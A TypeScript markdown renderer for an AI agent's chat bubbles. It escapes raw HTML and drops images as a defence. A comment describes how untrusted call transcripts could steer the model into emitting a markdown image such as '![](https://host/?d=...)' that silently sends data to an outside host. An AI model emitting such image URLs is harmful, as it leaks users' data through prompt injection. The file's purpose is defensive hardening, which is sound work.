import { Marked } from 'marked';

/** Escapes the characters that would otherwise be parsed as HTML. */
function escapeHtml(text: string): string {
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

/**
 * `breaks` because agents treat a single newline as a line break.
 *
 * The `html` renderer override turns raw HTML in the source into literal text. marked passes
 * it through untouched by default, and while the [innerHTML] binding would still sanitise it,
 * escaping here also means an agent writing `<threshold>` in prose sees it on screen instead
 * of watching it disappear as an unknown tag.
 *
 * The `image` override drops images entirely, keeping only the alt text. An <img> is not XSS, so
 * Angular's sanitiser permits it, and the browser fetches the URL with no user interaction — which
 * makes `![](https://host/?d=...)` a silent outbound request carrying whatever the model put in the
 * path. Call data reaches this model, and some of it (transcripts, tag reasoning) is written by
 * whoever was on the call, so the text steering that URL is not fully ours. The agent has no reason
 * to emit an image, so there is nothing to weigh against closing it.
 */
const markdown = new Marked({
  gfm: true,
  breaks: true,
  renderer: {
    html: ({ text }) => escapeHtml(text),
    image: ({ text }) => escapeHtml(text ?? ''),
  },
});

/**
 * Renders agent markdown to an HTML string for the chat bubbles.
 *
 * The result is bound with [innerHTML] rather than bypassSecurityTrustHtml, so Angular's DOM
 * sanitiser still runs over model output. This is also called on partially streamed text,
 * where an unterminated `**` or fence is normal — marked degrades those to literal text.
 */
export function renderMarkdown(text: string): string {
  if (!text) return '';
  try {
    return markdown.parse(text, { async: false });
  } catch {
    return escapeHtml(text);
  }
}
